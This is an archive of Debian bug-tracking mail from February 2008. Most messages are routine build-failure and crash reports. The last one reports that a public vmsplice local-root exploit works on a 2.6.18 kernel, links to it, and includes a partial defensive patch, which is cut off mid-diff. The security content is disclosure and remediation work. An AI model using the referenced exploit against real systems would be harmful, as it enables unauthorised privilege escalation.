talking about this indicates a serious mail system misconfiguration
somewhere.  Please contact me immediately.)

Debian bug tracking system administrator
(administrator, Debian Bugs database)

---BeginMessage---
Package: zapping
Version: 0.9.6-4+b1
Severity: grave
Justification: renders package unusable

The channel editor crashes Zapping.

Reproduce: start the program, select Edit - Channels from the menu. The
program crashes.

An error message is printed to the screen:
  (zapping:25763): Gtk-CRITICAL **: gtk_widget_set_sensitive: assertion 
`GTK_IS_WIDGET (widget)' failed


-- System Information:
Debian Release: lenny/sid
  APT prefers testing-proposed-updates
  APT policy: (500, 'testing-proposed-updates'), (500, 'proposed-updates'), 
(500, 'unstable'), (500, 'testing'), (500, 'stable'), (1, 'experimental')
Architecture: i386 (i686)

Kernel: Linux 2.6.23 (SMP w/2 CPU cores; PREEMPT)
Locale: [EMAIL PROTECTED], [EMAIL PROTECTED] (charmap=ISO-8859-15)

Versions of packages zapping depends on:
ii  gconf2  2.20.1-2 GNOME configuration database syste
ii  libart-2.0-22.3.19-3 Library of functions for 2D graphi
ii  libartsc0   1.5.8-1  aRts sound system C support librar
ii  libatk1.0-0 1.20.0-1 The ATK accessibility toolkit
ii  libaudiofile0   0.2.6-7  Open-source version of SGI's audio
ii  libbonobo2-02.20.2-1 Bonobo CORBA interfaces library
ii  libbonoboui2-0  2.20.0-1 The Bonobo UI library
ii  libc6   2.7-5GNU C Library: Shared libraries
ii  libcairo2   1.4.12-1 The Cairo 2D vector graphics libra
ii  libesd-alsa0 [libesd0]  0.2.36-3 Enlightened Sound Daemon (ALSA) - 
ii  libfontconfig1  2.5.0-2  generic font configuration library
ii  libfreetype62.3.5-1+b1   FreeType 2 font engine, shared lib
ii  libgconf2-4 2.20.1-2 GNOME configuration database syste
ii  libglade2-0 1:2.6.2-1library to load .glade files at ru
ii  libglib2.0-02.14.4-2 The GLib library of C routines
ii  libgnome-keyring0   2.20.2-1 GNOME keyring services library
ii  libgnome2-0 2.20.1.1-1   The GNOME 2 library - runtime file
ii  libgnomecanvas2-0   2.20.1.1-1   A powerful object-oriented display
ii  libgnomeui-02.20.1.1-1   The GNOME 2 libraries (User Interf
ii  libgnomevfs2-0  1:2.20.1-1   GNOME Virtual File System (runtime
ii  libgtk2.0-0 2.12.3-2 The GTK+ graphical user interface 
ii  libice6 2:1.0.4-1X11 Inter-Client Exchange library
ii  libjpeg62   6b-14The Independent JPEG Group's JPEG 
ii  liblircclient0  0.8.0-13 infra-red remote control support -
ii  liborbit2   1:2.14.7-0.1 libraries for ORBit2 - a CORBA ORB
ii  libpango1.0-0   1.18.3-1 Layout and rendering of internatio
ii  libpng12-0  1.2.15~beta5-3   PNG library - runtime
ii  libpopt01.10-3   lib for parsing cmdline parameters
ii  libsm6  2:1.0.3-1+b1 X11 Session Management library
ii  libx11-62:1.0.3-7X11 client-side library
ii  libxcursor1 1:1.1.9-1X cursor management library
ii  libxext61:1.0.3-2X11 miscellaneous extension librar
ii  libxfixes3  1:4.0.3-2X11 miscellaneous 'fixes' extensio
ii  libxi6  2:1.1.3-1X11 Input extension library
ii  libxinerama11:1.0.2-1X11 Xinerama extension library
ii  libxml2 2.6.30.dfsg-3GNOME XML library
ii  libxmu6 1:1.0.3-1X11 miscellaneous utility library
ii  libxrandr2  2:1.2.2-1X11 RandR extension library
ii  libxrender1 1:0.9.4-1X Rendering Extension client libra
ii  libxv1  1:1.0.3-1X11 Video extension library
ii  libzvbi00.2.26-3 Vertical Blanking Interval decoder
ii  python2.4   2.4.4-6  An interactive high-level object-o
ii  zlib1g  1:1.2.3.3.dfsg-8 compression library - runtime

zapping recommends no packages.

-- no debconf information


---End Message---
---BeginMessage---
Source: zapping
Source-Version: 0.10~cvs6-1

We believe that the bug you reported is fixed in the latest 

Bug#465041: ptop: FTBFS: rm: cannot remove `ptop.1': No such file or directory

2008-02-10 Thread Kurt Roeckx
Package: ptop
Version: 3.6.1~b3-1
Severity: serious

Hi,

Your package is failing to build with the following error:
# Remove extra cruft left over
rm ptop.1
rm: cannot remove `ptop.1': No such file or directory
make: *** [clean] Error 1


Kurt




-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#456837: marked as done (zapping: FTBFS: /usr/include/libzvbi.h:209: error: expected ';', ',' or ')' before '*' token)

2008-02-10 Thread Debian Bug Tracking System
Your message dated Sun, 10 Feb 2008 10:47:03 +
with message-id [EMAIL PROTECTED]
and subject line Bug#456837: fixed in zapping 0.10~cvs6-1
has caused the attached Bug report to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere.  Please contact me immediately.)

Debian bug tracking system administrator
(administrator, Debian Bugs database)

---BeginMessage---
Package: zapping
version: 0.9.6-4
Severity: serious
User: [EMAIL PROTECTED]
Usertags: qa-ftbfs-20071217 qa-ftbfs
Justification: FTBFS on i386

Hi,

During a rebuild of all packages in sid, your package failed to build on i386.

Relevant part:

  make[4]: Entering directory `/build/user/zapping-0.9.6/plugins/alirc'
  if /bin/sh ../../libtool --tag=CC --mode=compile i486-linux-gnu-gcc 
  -DHAVE_CONFIG_H -I. -I. -I../.. -I../.. -I/usr/include/python2.4 -DORBIT2=1 
  -pthread -I/usr/include/gtk-2.0 -I/usr/lib/gtk-2.0/include 
  -I/usr/include/atk-1.0 -I/usr/include/cairo -I/usr/include/pango-1.0 
  -I/usr/include/glib-2.0 -I/usr/lib/glib-2.0/include -I/usr/include/freetype2 
  -I/usr/include/libpng12 -I/usr/include/libgnomeui-2.0 
  -I/usr/include/libart-2.0 -I/usr/include/gconf/2 
  -I/usr/include/gnome-keyring-1 -I/usr/include/libgnome-2.0 
  -I/usr/include/libbonoboui-2.0 -I/usr/include/libgnomecanvas-2.0 
  -I/usr/include/gnome-vfs-2.0 -I/usr/lib/gnome-vfs-2.0/include 
  -I/usr/include/orbit-2.0 -I/usr/include/libbonobo-2.0 
  -I/usr/include/bonobo-activation-2.0 -I/usr/include/libxml2 
  -I/usr/include/gail-1.0 -I/usr/include/libglade-2.0
  -I/usr/include/kde/artsc -pthread -I/usr/include/glib-2.0 
  -I/usr/lib/glib-2.0/include -D_GNU_SOURCE   -I/usr/X11R6/include   
  -DPACKAGE_DATA_DIR=\/usr/share\   
  -DPACKAGE_LOCALE_DIR=\/usr/share/locale\   
  -DPACKAGE_PIXMAPS_DIR=\/usr/share/pixmaps/zapping\  
  -DPACKAGE_LIB_DIR=\/usr/lib/zapping\   -DPACKAGE_ZSFB_DIR=\/usr/sbin\   
  -DZAPPING8  -I/usr/X11R6/include  -Wall -g -O2 -MT alirc.lo -MD -MP -MF 
  .deps/alirc.Tpo -c -o alirc.lo alirc.c; \
   then mv -f .deps/alirc.Tpo .deps/alirc.Plo; else rm -f 
  .deps/alirc.Tpo; exit 1; fi
  mkdir .libs
   i486-linux-gnu-gcc -DHAVE_CONFIG_H -I. -I. -I../.. -I../.. 
  -I/usr/include/python2.4 -DORBIT2=1 -pthread -I/usr/include/gtk-2.0 
  -I/usr/lib/gtk-2.0/include -I/usr/include/atk-1.0 -I/usr/include/cairo 
  -I/usr/include/pango-1.0 -I/usr/include/glib-2.0 -I/usr/lib/glib-2.0/include 
  -I/usr/include/freetype2 -I/usr/include/libpng12 
  -I/usr/include/libgnomeui-2.0 -I/usr/include/libart-2.0 
  -I/usr/include/gconf/2 -I/usr/include/gnome-keyring-1 
  -I/usr/include/libgnome-2.0 -I/usr/include/libbonoboui-2.0 
  -I/usr/include/libgnomecanvas-2.0 -I/usr/include/gnome-vfs-2.0 
  -I/usr/lib/gnome-vfs-2.0/include -I/usr/include/orbit-2.0 
  -I/usr/include/libbonobo-2.0 -I/usr/include/bonobo-activation-2.0 
  -I/usr/include/libxml2 -I/usr/include/gail-1.0 -I/usr/include/libglade-2.0 
  -I/usr/include/kde/artsc -pthread -I/usr/include/glib-2.0 
  -I/usr/lib/glib-2.0/include -D_GNU_SOURCE -I/usr/X11R6/include 
  -DPACKAGE_DATA_DIR=\/usr/share\ -DPACKAGE_LOCALE_DIR=\/usr/share/locale\ 
  -DPACKAGE_PIXMAPS_DIR=\/usr/share/pixmaps/zapping\ 
  -DPACKAGE_LIB_DIR=\/usr/lib/zapping\ -DPACKAGE_ZSFB_DIR=\/usr/sbin\ 
  -DZAPPING8 -I/usr/X11R6/include -Wall -g -O2 -MT alirc.lo -MD -MP -MF 
  .deps/alirc.Tpo -c alirc.c  -fPIC -DPIC -o .libs/alirc.o
  In file included from ../../src/plugin_common.h:31,
   from alirc.c:27:
  /usr/include/libzvbi.h:209: error: expected ';', ',' or ')' before '*' token
  make[4]: *** [alirc.lo] Error 1
  make[4]: Leaving directory `/build/user/zapping-0.9.6/plugins/alirc'
  make[3]: *** [all-recursive] Error 1
  make[3]: Leaving directory `/build/user/zapping-0.9.6/plugins'
  make[2]: *** [all-recursive] Error 1
  make[2]: Leaving directory `/build/user/zapping-0.9.6'
  make[1]: *** [all] Error 2
  make[1]: Leaving directory `/build/user/zapping-0.9.6'
  make: *** [build-stamp] Error 2
  dpkg-buildpackage: failure: debian/rules build gave error exit status 2

The full build log is available from:
http://people.debian.org/~lucas/logs/2007/12/17

A list of current common problems and possible solutions is available at 
http://wiki.debian.org/qa.debian.org/FTBFS . You're welcome to contribute!

About the archive rebuild: The rebuild was done on about 50 AMD64 nodes
of the Grid'5000 platform, using a clean chroot containing a sid i386
environment.  Internet was not accessible from the build systems.

-- 
| Lucas Nussbaum
| [EMAIL PROTECTED]   http://www.lucas-nussbaum.net/ |
| jabber: [EMAIL PROTECTED] GPG: 1024D/023B3F4F |


---End Message---
---BeginMessage---
Source: zapping
Source-Version: 0.10~cvs6-1

Bug#465044: the whole system freezes when clicking on a link in pidgin

2008-02-10 Thread henry atting
Package: pidgin
Version: 2.3.1-2
Severity: critical
Justification: breaks the whole system

When in a Chat Window clicking on a link sent from a user the whole
system crashes

-- System Information:
Debian Release: lenny/sid
  APT prefers testing
  APT policy: (991, 'testing'), (500, 'gutsy'), (500, 'unstable'), (499, 
'experimental')
Architecture: i386 (i686)

Kernel: Linux 2.6.22-2-686 (SMP w/1 CPU core)
Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash

Versions of packages pidgin depends on:
ii  gconf2  2.20.1-2+b1  GNOME configuration database syste
ii  libatk1.0-0 1.20.0-1 The ATK accessibility toolkit
ii  libc6   2.7-6GNU C Library: Shared libraries
ii  libcairo2   1.4.14-1 The Cairo 2D vector graphics libra
ii  libdbus-1-3 1.1.2-1  simple interprocess messaging syst
ii  libdbus-glib-1-20.74-1   simple interprocess messaging syst
ii  libglib2.0-02.14.5-2 The GLib library of C routines
ii  libgstreamer0.10-0  0.10.15-4Core GStreamer libraries and eleme
ii  libgtk2.0-0 2.12.5-2 The GTK+ graphical user interface 
ii  libgtkspell02.0.10-4 a spell-checking addon for GTK's T
ii  libice6 2:1.0.4-1X11 Inter-Client Exchange library
ii  libpango1.0-0   1.18.4-1 Layout and rendering of internatio
ii  libpurple0  2.3.1-2  multi-protocol instant messaging l
ii  libsm6  2:1.0.3-1+b1 X11 Session Management library
ii  libstartup-notification00.9-1library for program launch feedbac
ii  libx11-62:1.0.3-7X11 client-side library
ii  libxss1 1:1.1.2-1X11 Screen Saver extension library
ii  pidgin-data 2.3.1-2  multi-protocol instant messaging c

Versions of packages pidgin recommends:
ii  gstreamer0.10-plugins-base0.10.15-4  GStreamer plugins from the base 
ii  gstreamer0.10-plugins-good0.10.6-4   GStreamer plugins from the good 

-- no debconf information



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#465045: Unsatisfiable Build-Dependencies: haskell-x11

2008-02-10 Thread Joachim Breitner
Package: xmonad
Version: 0.6-1
Severity: serious

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Hi myself and other people looking at this list,

xmonad currently has a versioned build dependency on libghc6-x11-dev
1.4.1, which is not yet in debian. This bug is here to track this.

Greetings,
Joachim

- -- System Information:
Debian Release: lenny/sid
  APT prefers unstable
  APT policy: (500, 'unstable'), (1, 'experimental')
Architecture: i386 (i686)

Kernel: Linux 2.6.24-1-686 (SMP w/1 CPU core)
Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash

Versions of packages xmonad depends on:
ii  libc6 2.7-6  GNU C Library: Shared libraries
ii  libgmp3c2 2:4.2.2+dfsg-2 Multiprecision arithmetic library
ii  libx11-6  2:1.0.3-7  X11 client-side library
ii  libxext6  1:1.0.3-2  X11 miscellaneous extension librar
ii  libxinerama1  1:1.0.2-1  X11 Xinerama extension library

Versions of packages xmonad recommends:
ii  libghc6-xmonad-dev0.6-1  A lightweight X11 window manager
ii  libghc6-xmonad-doc0.6-1  A lightweight X11 window manager; 

- -- no debconf information

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFHrtxm9ijrk0dDIGwRAk1eAKCODmLFRSn1dL+dATXsQW7rQQ7DAgCeMjve
TWIPNShiK9IChwIifbi+Te8=
=FGiS
-END PGP SIGNATURE-



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#465039: [SPAM] - [Erlang-pkg-devel] Bug#465039: erlang: FTBFS:megaco_flex_scanner_drv.flex:1: bad character: / - Bayesian Filter detected spam

2008-02-10 Thread Sergei Golovan
On 2/10/08, Kurt Roeckx [EMAIL PROTECTED] wrote:
 Package: erlang
 Version: 1:12.b.1-dfsg-1
 Severity: serious

 Hi,

 Your package is failing to build with the following error:
 flex -Ca -Pmegaco_flex_scanner_drv -omegaco_flex_scanner_drv.c 
 megaco_flex_scanner_drv.flex

It's a bug in flex. It's already reported as http://bugs.debian.org/464659

-- 
Sergei Golovan



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Processed: block 465045 with 454440

2008-02-10 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 # Automatically generated email from bts, devscripts version 2.10.15
 block 465045 with 454440
Bug#454440: New upstream version 1.4.0
Bug#465045: Unsatisfiable Build-Dependencies: haskell-x11
Was not blocked by any bugs.
Blocking bugs of 465045 added: 454440


End of message, stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#465046: symbol lookup error

2008-02-10 Thread Eugene Apollonsky
Package: ktorrent
Version: 2.2.5.dfsg.1-1
Severity: serious

--- Please enter the report below this line. ---
Ktorrent is not started. I get in console:

ktorrent: symbol lookup error: /usr/lib/libktorrent-2.2.5.so: undefined 
symbol: lstat64

debian:~# ldd /usr/lib/libktorrent-2.2.5.so
linux-vdso.so.1 =  (0x7fff2e9fd000)
libgmp.so.3 = /usr/lib/libgmp.so.3 (0x2af47c4fb000)
libkparts.so.2 = /usr/lib/libkparts.so.2 (0x2af47c73a000)
libqt-mt.so.3 = /usr/lib/libqt-mt.so.3 (0x2af47c996000)
libkdecore.so.4 = /usr/lib/libkdecore.so.4 (0x2af47d5d3000)
libkdeui.so.4 = /usr/lib/libkdeui.so.4 (0x2af47da88000)
libkio.so.4 = /usr/lib/libkio.so.4 (0x2af47e054000)
libstdc++.so.6 = /usr/lib/libstdc++.so.6 (0x2af47e64b000)
libm.so.6 = /lib/libm.so.6 (0x2af47e956000)
libc.so.6 = /lib/libc.so.6 (0x2af47ebd8000)
libgcc_s.so.1 = /lib/libgcc_s.so.1 (0x2af47ef36000)
libfontconfig.so.1 = /usr/lib/libfontconfig.so.1 (0x2af47f14d000)
libaudio.so.2 = /usr/lib/libaudio.so.2 (0x2af47f37e000)
libXt.so.6 = /usr/lib/libXt.so.6 (0x2af47f596000)
libjpeg.so.62 = /usr/lib/libjpeg.so.62 (0x2af47f7f7000)
libpng12.so.0 = /usr/lib/libpng12.so.0 (0x2af47fa1a000)
libz.so.1 = /usr/lib/libz.so.1 (0x2af47fc3e000)
libXi.so.6 = /usr/lib/libXi.so.6 (0x2af47fe55000)
libXrender.so.1 = /usr/lib/libXrender.so.1 (0x2af48005f000)
libXrandr.so.2 = /usr/lib/libXrandr.so.2 (0x2af480268000)
libXcursor.so.1 = /usr/lib/libXcursor.so.1 (0x2af48046f000)
libXinerama.so.1 = /usr/lib/libXinerama.so.1 (0x2af48067a000)
libXft.so.2 = /usr/lib/libXft.so.2 (0x2af48077c000)
libfreetype.so.6 = /usr/lib/libfreetype.so.6 (0x2af48088f000)
libXext.so.6 = /usr/lib/libXext.so.6 (0x2af480b0d000)
libX11.so.6 = /usr/lib/libX11.so.6 (0x2af480c1e000)
libSM.so.6 = /usr/lib/libSM.so.6 (0x2af480e27000)
libICE.so.6 = /usr/lib/libICE.so.6 (0x2af48103)
libdl.so.2 = /lib/libdl.so.2 (0x2af48124b000)
libpthread.so.0 = /lib/libpthread.so.0 (0x2af48144f000)
libDCOP.so.4 = /usr/lib/libDCOP.so.4 (0x2af48166b000)
libresolv.so.2 = /lib/libresolv.so.2 (0x2af4818a7000)
libutil.so.1 = /lib/libutil.so.1 (0x2af481abc000)
libart_lgpl_2.so.2 = /usr/lib/libart_lgpl_2.so.2 (0x2af481cc)
libidn.so.11 = /usr/lib/libidn.so.11 (0x2af481ed7000)
libkdefx.so.4 = /usr/lib/libkdefx.so.4 (0x2af482109000)
libkdesu.so.4 = /usr/lib/libkdesu.so.4 (0x2af482335000)
libkwalletclient.so.1 = /usr/lib/libkwalletclient.so.1 
(0x2af48254c000)
libfam.so.0 = /usr/lib/libfam.so.0 (0x2af48275f000)
libacl.so.1 = /lib/libacl.so.1 (0x2af482968000)
libattr.so.1 = /lib/libattr.so.1 (0x2af482b6f000)
/lib64/ld-linux-x86-64.so.2 (0x4000)
libexpat.so.1 = /usr/lib/libexpat.so.1 (0x2af482d73000)
libXfixes.so.3 = /usr/lib/libXfixes.so.3 (0x2af482f97000)
libXau.so.6 = /usr/lib/libXau.so.6 (0x2af48309c000)
libXdmcp.so.6 = /usr/lib/libXdmcp.so.6 (0x2af48319f000)

--- System information. ---
Architecture: amd64
Kernel:   Linux 2.6.23-1-amd64

Debian Release: lenny/sid
  500 unstableftp.yandex.ru 

--- Package information. ---
Depends  (Version) | Installed
==-+-==
kdelibs4c2a  (= 4:3.5.8.dfsg.1-5) | 4:3.5.8.dfsg.1-7
libavahi-client3   (= 0.6.13) | 0.6.22-2
libavahi-common3   (= 0.6.10) | 0.6.22-2
libavahi-qt3-1  (= 0.6.0) | 0.6.22-2
libc6   (= 2.7-1) | 2.7-6
libgcc1(= 1:4.1.1-21) | 1:4.3-20080202-1
libgeoip1  | 1.4.4.dfsg-1
libgmp3c2  | 2:4.2.2+dfsg-2
libqt3-mt (= 3:3.3.7) | 3:3.3.8b-1
libstdc++6(= 4.2.1-4) | 4.3-20080202-1




-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Processed: tkltrkl

2008-02-10 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 tag 464136 + fixed-upstream
Bug#464136: Chmod() doesn't accept more than one Node
Tags were: upstream
Tags added: fixed-upstream


End of message, stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#465048: opensync_0.36-1(hppa/experimental): FTBFS: missing -fPIC somewhere

2008-02-10 Thread Frank Lichtenheld
Package: opensync
Version: 0.36-1
Severity: serious

Hi,

your package failed to build from source.

| Automatic build of opensync_0.36-1 on lofn by sbuild/hppa 98-farm
| Build started at 20080210-0321
| **
| Checking available source versions...
| Fetching source files...
| Reading package lists...
| Building dependency tree...
| Need to get 1005kB of source archives.
| Get:1 http://sinclair.farm.ftbfs.de experimental/main opensync 0.36-1 (dsc) 
[825B]
| Get:2 http://sinclair.farm.ftbfs.de experimental/main opensync 0.36-1 (tar) 
[997kB]
| Get:3 http://sinclair.farm.ftbfs.de experimental/main opensync 0.36-1 (diff) 
[6905B]
| Fetched 1005kB in 0s (1055kB/s)
| Download complete and in download only mode
| ** Using build dependencies supplied by package:
| Build-Depends: check, cmake, debhelper (= 5.0.37.2), libglib2.0-dev, 
libsqlite3-dev, libxml2-dev, python-all-dev (= 2.3.5-11), python-support (= 
0.3.9), swig
| Checking for already installed source dependencies...
[...]
| /usr/bin/cc  -fPIC -g -Wall -O2 -O2 -g  -shared -Wl,-soname,mock-sync.so -o 
mock-sync.so CMakeFiles/mock-sync.dir/mock_sync.o 
-L/build/buildd/opensync-0.36/debian/build-python2.4/opensync -lopensync 
-lcheck -lglib-2.0 -lgmodule-2.0 -ldl -lglib-2.0 -lgthread-2.0 -lrt -lglib-2.0 
-lgthread-2.0 -lrt -lglib-2.0 -lgmodule-2.0 -ldl -lglib-2.0 -lxml2 -lsqlite3 
| /usr/bin/ld: /usr/lib/gcc/hppa-linux-gnu/4.2.3/../../../libcheck.a(check.o): 
relocation R_PARISC_DPREL21L can not be used when making a shared object; 
recompile with -fPIC
| /usr/lib/gcc/hppa-linux-gnu/4.2.3/../../../libcheck.a: could not read 
symbols: Bad value
| collect2: ld returned 1 exit status
| make[3]: *** [tests/mock-plugin/mock-sync.so] Error 1
| make[3]: Leaving directory 
`/build/buildd/opensync-0.36/debian/build-python2.4'
| make[2]: *** [tests/mock-plugin/CMakeFiles/mock-sync.dir/all] Error 2
| make[2]: Leaving directory 
`/build/buildd/opensync-0.36/debian/build-python2.4'
| make[1]: *** [all] Error 2
| make[1]: Leaving directory 
`/build/buildd/opensync-0.36/debian/build-python2.4'
| make: *** [debian/build-python2.4-stamp] Error 2
| dpkg-buildpackage: failure: debian/rules build gave error exit status 2
| **
| Build finished at 20080210-0331
| FAILED [dpkg-buildpackage died]

Full build log(s): 
http://experimental.ftbfs.de/build.php?ver=0.36-1pkg=opensyncarch=hppa

Gruesse,
-- 
Frank Lichtenheld [EMAIL PROTECTED]
www: http://www.djpig.de/



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#465050: pam-fprint_0.2-1(hppa/experimental): FTBFS: missing pkg-config build-depends

2008-02-10 Thread Frank Lichtenheld
Package: pam-fprint
Version: 0.2-1
Severity: serious

Hi,

your package failed to build from source.

| Automatic build of pam-fprint_0.2-1 on lofn by sbuild/hppa 98-farm
| Build started at 20080210-0400
| **
| Checking available source versions...
| Fetching source files...
| Reading package lists...
| Building dependency tree...
| Need to get 94.2kB of source archives.
| Get:1 http://sinclair.farm.ftbfs.de experimental/main pam-fprint 0.2-1 (dsc) 
[778B]
| Get:2 http://sinclair.farm.ftbfs.de experimental/main pam-fprint 0.2-1 (tar) 
[90.3kB]
| Get:3 http://sinclair.farm.ftbfs.de experimental/main pam-fprint 0.2-1 (diff) 
[3171B]
| Fetched 94.2kB in 0s (589kB/s)
| Download complete and in download only mode
| ** Using build dependencies supplied by package:
| Build-Depends: autotools-dev, debhelper (= 5), libfprint-dev, libpam-dev
| Checking for already installed source dependencies...
[...]
| checking for hppa-linux-gnu-pkg-config... no
| checking for pkg-config... no
| checking for FPRINT... configure: error: The pkg-config script could not be 
found or is too old.  Make sure it
| is in your PATH or set the PKG_CONFIG environment variable to the full
| path to pkg-config.
| 
| Alternatively, you may set the environment variables FPRINT_CFLAGS
| and FPRINT_LIBS to avoid the need to call pkg-config.
| See the pkg-config man page for more details.
| 
| To get pkg-config, see http://pkg-config.freedesktop.org/.
| See `config.log' for more details.
| make: *** [config.status] Error 1
| dpkg-buildpackage: failure: debian/rules build gave error exit status 2
| **
| Build finished at 20080210-0403
| FAILED [dpkg-buildpackage died]

Full build log(s): 
http://experimental.ftbfs.de/build.php?ver=0.2-1pkg=pam-fprintarch=hppa

Gruesse,
-- 
Frank Lichtenheld [EMAIL PROTECTED]
www: http://www.djpig.de/



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#464792: Upgrading to latest php packages has stopped phpldapadmin working

2008-02-10 Thread Fabio Tranchitella
Hello,

* 2008-02-09 01:47, Jamie Thompson wrote:
 Package: phpldapadmin
 Version: 1.1.0.4-2
 Severity: grave
 Justification: renders package unusable
 
 The packages I just installed are shown below:

Can you please try the package in unstable (1.1.0.5-1)?
It should fix your problem.

Thanks,

-- 
Fabio Tranchitella http://www.kobold.it
Free Software Developer and Consultant http://www.tranchitella.it
_
1024D/7F961564, fpr 5465 6E69 E559 6466 BF3D 9F01 2BF8 EE2B 7F96 1564



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#464975: plone3-site: Upgrading to 3.0.5-2 breaks plone cmf

2008-02-10 Thread Fabio Tranchitella
Hello,

* 2008-02-10 08:17, Soren Stoutner wrote:
 Package: plone3-site
 Version: 3.0.5-2
 Severity: grave
 Justification: renders package unusable
 
 Upgrading a Debian testing box to 3.0.5-2 from 3.0.5-1 (I believe) on my
 AMD64 box broke the Plone CMF.  In the Zope management interface it lists
 my Plone folders by name with the following text in parethesis afterwords
 This object from the CMFPlone product is broken!  When I click on the
 broken objects it loads a page with the following text: This object is
 broken because the CMFPlone product that created it is no longer
 installed or is installed incorrectly. Please contact the product
 maintainer for assistance.  Note that the data associated with this
 product has not been lost, and will be accessible again if the product is
 reinstalled.

Can you please send me the output of find /var/lib/zope2.10/plone3-site?

 Could their be some old config files hanging around that caused this
 confusion and also relate to this bug?

Are you using the plone3-site instance or an hand-made one?

Thanks,

-- 
Fabio Tranchitella http://www.kobold.it
Free Software Developer and Consultant http://www.tranchitella.it
_
1024D/7F961564, fpr 5465 6E69 E559 6466 BF3D 9F01 2BF8 EE2B 7F96 1564



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#465052: FTBFS: flex failure

2008-02-10 Thread Christian Perrier
Package: slashem
Version: 0.0.7E7F3-1
Severity: serious

While trying to rebuild your package with pbuilder, to fix the incorrect 
encoding of
debian/changelog, I went on the following:

(if you fix this, please also fix the debian/changelog encoding
issues...even if you NMU the package)

.../...
make[2]: Entering directory /tmp/buildd/slashem-0.0.7E7F3/util'
bison -y  -d lev_comp.y
mv y.tab.c lev_yacc.c
mv y.tab.h ../include/lev_comp.h
cc -O2 -fomit-frame-pointer -I../include -I/usr/X11R6/include   -c -o
lev_yacc.o lev_yacc.c
lev_comp.y: In function 'yyparse':
lev_comp.y:600: warning: assignment from incompatible pointer type
flex  lev_comp.l
lev_comp.l:106: bad character: %
lev_comp.l:106: unknown error processing section 1
lev_comp.l:106: unknown error processing section 1
lev_comp.l:106: bad character: 1
lev_comp.l:106: bad character: 5
lev_comp.l:106: bad character: 0
lev_comp.l:106: bad character: 0
lev_comp.l:107: bad character: %
lev_comp.l:107: unknown error processing section 1
lev_comp.l:107: bad character: 5
lev_comp.l:107: bad character: 0
lev_comp.l:107: bad character: 0
lev_comp.l:107: bad character: 0
lev_comp.l:108: bad character: %
lev_comp.l:108: unknown error processing section 1
lev_comp.l:108: bad character: 1
lev_comp.l:108: bad character: 0
lev_comp.l:108: bad character: 0
lev_comp.l:108: bad character: 0
make[2]: *** [lev_lex.c] Error 1
make[2]: Leaving directory /tmp/buildd/slashem-0.0.7E7F3/util'
make[1]: *** [spec_levs] Error 2
make[1]: Leaving directory /tmp/buildd/slashem-0.0.7E7F3'
make: *** [build-stamp] Error 2
dpkg-buildpackage: failure: debian/rules build gave error exit status 2




-- System Information:
Debian Release: lenny/sid
  APT prefers unstable
  APT policy: (500, 'unstable')
Architecture: i386 (i686)

Kernel: Linux 2.6.23-1-686 (SMP w/1 CPU core)
Locale: LANG=fr_FR.UTF-8, LC_CTYPE=fr_FR.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#464945: linux-image-2.6.18-6-686: Exploit for vmsplice work for linux-image-2.18-5-686 (CVE-2008-0009/10)

2008-02-10 Thread Bastian Blank
tags 464945 patch

On Sun, Feb 10, 2008 at 03:19:20AM +0300, Okulov Vitaliy wrote:
 Just try explot from http://www.milw0rm.com/exploits/5092 at my
 linux-image-2.6.18-5-686 kernel. And it works. Please backport patch
 from 2.6.24.1 kernel (CVE-2008-0009/10).

Preliminary patch, it includes more checks then the update in 2.6.24.1.

It at least fixes the exploit.

Bastian
diff --git a/fs/splice.c b/fs/splice.c
index 684bca3..2d7e598 100644
--- a/fs/splice.c
+++ b/fs/splice.c
@@ -1122,6 +1122,11 @@ static int get_iovec_page_array(const struct iovec 
__user *iov,
size_t len;
int i;
 
+   if (!access_ok(VERIFY_READ, iov, sizeof(struct iovec))) {
+   error = -EFAULT;
+   break;
+   }
+
/*
 * Get user address base and length for this iovec.
 */
@@ -1141,6 +1146,11 @@ static int get_iovec_page_array(const struct iovec 
__user *iov,
if (unlikely(!base))
break;
 
+   if (!access_ok(VERIFY_READ, base, len)) {
